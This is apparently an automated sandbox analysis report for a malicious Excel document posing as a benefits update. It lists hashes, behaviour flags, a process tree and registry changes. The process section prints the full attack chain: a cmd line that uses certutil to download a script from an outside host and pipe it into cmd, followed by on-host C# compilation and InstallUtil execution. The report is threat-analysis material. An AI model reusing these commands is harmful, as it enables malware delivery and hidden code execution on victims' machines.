General Info Watch the FULL Interactive Analysis at ANY.RUN!

File name

RQ_Benefits_Update.xlsx

Verdict
Malicious activity
Analysis date
11/8/2018, 16:22:15
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
opendir
Indicators:

MIME:
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info:
Microsoft Excel 2007+
MD5

04431ee4523df314c921dd9c2a08642c

SHA1

30ae42e86e766f353fa2086a699adf0820ffcccb

SHA256

5e597e02c218cfa90e096b2901b33d75fc7569c6b9ce0295341c27f49eed00be

SSDEEP

384:AZ5KORl7S/cdWn1lHdsCaR9Bw1Az4LAQITM9w65FyuUigf2p9raXAlBQTdXhHEIF:U5hgUq1/daR9BeAMLzIg+crgAlBCXhb1

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 3552)
Starts CertUtil for downloading files
  • cmd.exe (PID: 3160)
Runs app for hidden code execution
  • cmd.exe (PID: 3160)
Starts CMD.EXE for commands execution
  • EXCEL.EXE (PID: 3552)
Reads Internet Cache Settings
  • InstallUtil.exe (PID: 2312)
Application launched itself
  • cmd.exe (PID: 2012)
  • cmd.exe (PID: 3160)
Starts CMD.EXE for commands execution
  • cmd.exe (PID: 2012)
  • cmd.exe (PID: 3160)
Executable content was dropped or overwritten
  • csc.exe (PID: 3096)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 3552)
Reads settings of System Certificates
  • InstallUtil.exe (PID: 2312)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.xlsx
|   Excel Microsoft Office Open XML Format document (61.2%)
.zip
|   Open Packaging Conventions container (31.5%)
.zip
|   ZIP compressed archive (7.2%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
0x0006
ZipCompression:
Deflated
ZipModifyDate:
1980:01:01 00:00:00
ZipCRC:
0x45017cff
ZipCompressedSize:
439
ZipUncompressedSize:
2003
ZipFileName:
[Content_Types].xml
XMP
Creator:
Jerry Bidondo
XML
LastModifiedBy:
Ian Moorhouse
LastPrinted:
2015:07:17 17:21:05Z
CreateDate:
2015:04:17 19:05:13Z
ModifyDate:
2018:11:08 14:20:42Z
Application:
Microsoft Excel
DocSecurity:
None
ScaleCrop:
No
HeadingPairs
null
null
TitlesOfParts
null
null
null
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
AppVersion:
16.03

Screenshots

Processes

Total processes
43
Monitored processes
13
Malicious processes
2
Suspicious processes
1

Behavior graph

+
start excel.exe no specs cmd.exe no specs certutil.exe cmd.exe no specs cmd.exe no specs where.exe no specs cmd.exe no specs where.exe no specs cmd.exe no specs where.exe no specs csc.exe cvtres.exe no specs installutil.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3552
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\winmm.dll
c:\program files\common files\microsoft shared\office14\1033\alrtintl.dll
c:\windows\system32\sxs.dll

PID
3160
CMD
"MSEXCEL.EXE \..\..\..\Windows\System32\cmd.exe" /c certutil.exe -urlcache -split -f http://healthbenefitsenrollment.com/updates/update.txt && cmd < update.txt
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3240
CMD
certutil.exe -urlcache -split -f http://healthbenefitsenrollment.com/updates/update.txt
Path
C:\Windows\system32\certutil.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
CertUtil.exe
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\certutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\certcli.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wldap32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\cryptui.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\samcli.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\ntmarta.dll

PID
2012
CMD
cmd
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\microsoft.net\framework\v4.0.30319\installutil.exe

PID
3544
CMD
C:\Windows\system32\cmd.exe /c where /r "C:\Windows\Microsoft.NET\Framework" "csc.exe"
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\where.exe

PID
3716
CMD
where /r "C:\Windows\Microsoft.NET\Framework" "csc.exe"
Path
C:\Windows\system32\where.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Where - Lists location of files
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\where.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3956
CMD
C:\Windows\system32\cmd.exe /c where /r "C:\windows\assembly" "system.management.automation.dll"
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
2100
CMD
where /r "C:\windows\assembly" "system.management.automation.dll"
Path
C:\Windows\system32\where.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Where - Lists location of files
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\where.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2532
CMD
C:\Windows\system32\cmd.exe /c where /r "C:\Windows\Microsoft.NET\Framework" "InstallUtil.exe"
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
1896
CMD
where /r "C:\Windows\Microsoft.NET\Framework" "InstallUtil.exe"
Path
C:\Windows\system32\where.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Where - Lists location of files
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\where.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3096
CMD
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /reference:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll secureportal.cs
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Visual C# Command Line Compiler
Version
4.6.1055.0 built by: NETFXREL2
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v4.0.30319\alink.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscorpehost.dll
c:\windows\system32\apphelp.dll
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe

PID
3556
CMD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES8D85.tmp" "c:\Users\admin\Documents\CSC6E5CC93A1F0B4235A2BAC703AE57FF.TMP"
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Indicators
No indicators
Parent process
csc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® Resource File To COFF Object Conversion Utility
Version
12.00.52512.0 built by: VSWINSERVICING
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll

PID
2312
CMD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U secureportal.exe
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
.NET Framework installation utility
Version
4.6.1055.0 built by: NETFXREL2
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\installutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\225759bb87c854c0fff27b1d84858c21\mscorlib.ni.dll
c:\windows\system32\ole32.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\system32\oleaut32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\52cca48930e580e3189eac47158c20be\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\ecc5bbc5c2734b2451ced2f668f40911\system.configuration.install.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\users\admin\documents\secureportal.exe
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\55560c2014611e9119f99923c9ebdeef\system.core.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\46957030830964165644b52b0696c5d9\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\d86b080a37c60a872c82b912a2a63dac\system.xml.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.runteb92aa12#\c56771a9cfb87e660d60453e232abe27\system.runtime.serialization.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\assembly\gac_msil\microsoft.powershell.commands.diagnostics\1.0.0.0__31bf3856ad364e35\microsoft.powershell.commands.diagnostics.dll
c:\windows\assembly\gac_msil\microsoft.wsman.management\1.0.0.0__31bf3856ad364e35\microsoft.wsman.management.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\e7044d177c8e852b85908d2702898ec8\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\gac_msil\microsoft.powershell.commands.utility\1.0.0.0__31bf3856ad364e35\microsoft.powershell.commands.utility.dll
c:\windows\assembly\gac_msil\microsoft.powershell.consolehost\1.0.0.0__31bf3856ad364e35\microsoft.powershell.consolehost.dll
c:\windows\assembly\gac_msil\microsoft.powershell.commands.management\1.0.0.0__31bf3856ad364e35\microsoft.powershell.commands.management.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\4dfa27fdd6a4cce26f99585e1c744f9b\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.serv759bfb78#\86909e4c4c7deb51e42b8f335c7aaa77\system.serviceprocess.ni.dll
c:\windows\assembly\gac_msil\microsoft.powershell.security\1.0.0.0__31bf3856ad364e35\microsoft.powershell.security.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\34fd28526bdd6ec1e9f0d0776062fbbb\system.directoryservices.ni.dll
c:\windows\system32\secur32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\032f5fa875be86b577722ddeeee2e51c\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\credssp.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\devrtl.dll

Registry activity

Total events
754
Read events
684
Write events
65
Delete events
5

Modification events

PID
Process
Operation
Key
Name
Value
3552
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
3552
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
3552
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\183758
3552
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
3552
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
4*$
342A2400E00D0000010000000000000000000000
3552
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3552
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
